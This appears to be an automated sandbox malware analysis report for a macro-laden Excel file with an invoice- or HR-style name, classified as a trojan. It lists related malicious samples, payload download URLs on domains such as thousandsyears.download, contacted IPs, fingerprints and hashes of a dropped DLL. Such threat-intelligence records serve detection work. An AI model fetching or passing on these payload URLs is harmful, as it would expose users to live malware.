                                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                                            Overall analysis duration:0h 6m 37s
                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                            Report type:full
                                                                                                                                                                            Sample file name:LL52387-01-F4448869.xlsm
                                                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                            Number of analysed new started processes analysed:6
                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                            Technologies:
                                                                                                                                                                            • HCA enabled
                                                                                                                                                                            • EGA enabled
                                                                                                                                                                            • HDC enabled
                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                            Detection:MAL
                                                                                                                                                                            Classification:mal100.troj.expl.evad.winXLSM@7/4@7/5
                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                            HDC Information:
                                                                                                                                                                            • Successful, ratio: 70.6% (good quality ratio 56.6%)
                                                                                                                                                                            • Quality average: 70.2%
                                                                                                                                                                            • Quality standard deviation: 40%
                                                                                                                                                                            HCA Information:
                                                                                                                                                                            • Successful, ratio: 76%
                                                                                                                                                                            • Number of executed functions: 12
                                                                                                                                                                            • Number of non-executed functions: 3
                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                            • Adjust boot time
                                                                                                                                                                            • Enable AMSI
                                                                                                                                                                            • Found application associated with file extension: .xlsm
                                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                                            • Scroll down
                                                                                                                                                                            • Close Viewer
                                                                                                                                                                            Warnings:
                                                                                                                                                                            Show All
                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                            Simulations

                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                            No simulations

                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                            IPs

                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                            172.67.198.51HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                            PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                            uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                            Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                            Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                            List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                            HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                            sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                            Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                            Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                            DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                            PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                            13.224.92.73Schedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                              HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        104.21.55.83uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                        Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • uppercilio.fun/div/44376,8555986111.jpg

                                                                                                                                                                                        Domains

                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                        voopeople.funSchedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.12.122
                                                                                                                                                                                        uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.12.122
                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        thousandsyears.downloadSchedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.52.111
                                                                                                                                                                                        HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                        PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                        uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                        Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                        Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                        List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.52.111
                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.198.51
                                                                                                                                                                                        uppercilio.funSchedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.146.88
                                                                                                                                                                                        HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.146.88
                                                                                                                                                                                        PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.146.88
                                                                                                                                                                                        uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.55.83
                                                                                                                                                                                        Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.55.83
                                                                                                                                                                                        Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.146.88
                                                                                                                                                                                        List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.146.88
                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.55.83
                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.146.88
                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.55.83
                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.55.83
                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.55.83
                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.55.83
                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.55.83

                                                                                                                                                                                        ASN

                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                        CLOUDFLARENETUS13076885-RFQ.docGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.19.200
                                                                                                                                                                                        Schedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        Cava.com_Fax-Message.htmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.16.18.94
                                                                                                                                                                                        VM52MC9YQDUO0P.htmlGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.16.18.94
                                                                                                                                                                                        PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.12.122
                                                                                                                                                                                        uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.12.122
                                                                                                                                                                                        runsys32.dllGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.20.185.68
                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        SMR8OzIgNB.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.8.151
                                                                                                                                                                                        Follow up Purchase order num- 4500262450.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 104.21.75.42
                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 172.67.194.117
                                                                                                                                                                                        AMAZON-02USSchedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        Enquiry#List For Order070621.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.59.53.244
                                                                                                                                                                                        PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                        uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                        Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                        Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 143.204.91.74
                                                                                                                                                                                        List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.225.75.73
                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        Reciept 19129475.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                        • 54.191.98.150
                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 143.204.4.74
                                                                                                                                                                                        GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msiGet hashmaliciousBrowse
                                                                                                                                                                                        • 18.231.168.212
                                                                                                                                                                                        39d0c1e7.msiGet hashmaliciousBrowse
                                                                                                                                                                                        • 3.143.159.48
                                                                                                                                                                                        Movcy_v1.0.0.apkGet hashmaliciousBrowse
                                                                                                                                                                                        • 52.39.180.2
                                                                                                                                                                                        order No. 00192099##001 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 3.143.65.214

                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                        05af1f5ca1b87cc9cc9b25185115607d13076885-RFQ.docGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        Schedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        108020075.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        G-DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        1.docGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        DECL G50 EURL!.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73
                                                                                                                                                                                        Order No. 211128.docGet hashmaliciousBrowse
                                                                                                                                                                                        • 13.224.92.73

                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlSchedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                            PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                              uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                  Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                      HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                          sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                            Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                    C:\Users\user\XTOWN.dllSchedule-982347-Y6844315.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      HRScheduleH3965005.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                        PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                          uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                              Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                  HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                    Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                      sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                          Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                            DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                              PI-210610.xlsmGet hashmaliciousBrowse

                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
                                                                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):57856
                                                                                                                                                                                                                                                Entropy (8bit):4.963425128586394
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                                                                MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                                                                SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                                                                SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                                                                SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: Schedule-982347-Y6844315.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: HRScheduleH3965005.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: PI-9823472110866.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: uhr908723097306.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: Vac.list07-2021-6014910.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: Vac.list07-20214862208.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: List-4527768.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: Formtofill4184860.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7EB577B2.png
                                                                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                                File Type:PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):174009
                                                                                                                                                                                                                                                Entropy (8bit):7.967231122944825
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
                                                                                                                                                                                                                                                MD5:C0AF15BAE70AFFC4BE7625110AEEF09A
                                                                                                                                                                                                                                                SHA1:AEF94E038F0538C812AAF9EF605F76AF2376A26D
                                                                                                                                                                                                                                                SHA-256:D2F5852B2EF010150C0C8A980F25B715C6363A8C4454C711B9E9F2B2532F1657
                                                                                                                                                                                                                                                SHA-512:131DECBB06F1CE1A049BBF25B49615320FB4DC6DF5D3DA8B44EAE455D6ACC8AE12981BC108431DCC01D21EABFE1A552581C508F57FD3FDB7D7B06B5346522B2B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                Preview: .PNG........IHDR...@...@.......~.....PLTE.....3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................(....tRNS...................................................................................................................................................................................
                                                                                                                                                                                                                                                C:\Users\user\Desktop\~$LL52387-01-F4448869.xlsm
                                                                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):165
                                                                                                                                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                                                                                                                                                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                                                                                                                                                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                                                                                                                                                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                                                                                                                                                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                                                C:\Users\user\XTOWN.dll
                                                                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):57856
                                                                                                                                                                                                                                                Entropy (8bit):4.963425128586394
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                                                                MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                                                                SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                                                                SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                                                                SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Joe Sandbox View:
